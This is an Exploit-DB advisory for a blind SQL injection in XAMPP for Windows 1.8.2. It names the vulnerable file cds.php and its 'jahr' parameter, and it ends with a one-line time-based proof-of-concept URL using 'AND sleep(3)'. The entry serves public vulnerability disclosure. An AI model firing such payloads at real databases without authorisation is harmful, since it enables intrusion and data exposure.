XAMPP for Windows 1.8.2 - Blind SQL Injection

2013-10-29T00:00:00
ID EDB-ID:29292
Type exploitdb
Reporter Sebastián Magof
Modified 2013-10-29T00:00:00

Description

XAMPP for Windows 1.8.2 - Blind SQL Injection. Webapps exploit for windows platform

                                        
                                            # Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection
# Date: 2013/10/28
# Exploit Author: Sebastiรกn Magof
# Vendor Homepage: apachefriends.org
# Software Link: apachefriends.org/en/xampp-windows.html
# Version:1.8.2/1.7.7
# Tested on: Windows
# Twitter: @smagof
#Greetz: Family, Friends && Under guys;
#Special Greetz: My Alpha (:


#Description:XAMPP is a platform-independent server, free software, which
mainly consists of the MySQL database, the Apache web server and
interpreters for scripting languages: PHP and Perl. The name comes from
the acronym for X, Apache, MySQL, PHP, Perl.


#Sql-Injection: An attacker may execute arbitrary SQL statements on the
vulnerable system. This may compromise the integrity of your database
and/or expose sensitive information.
#Vulnerable file: cds.php
#Parameter: "jahr="

#Exploit:
http://127.0.0.1/xampp/cds.php?jahr=1967 AND
sleep(3)&interpret=1&titel=555-666-0606



# (\/)
# (**)
#(")(")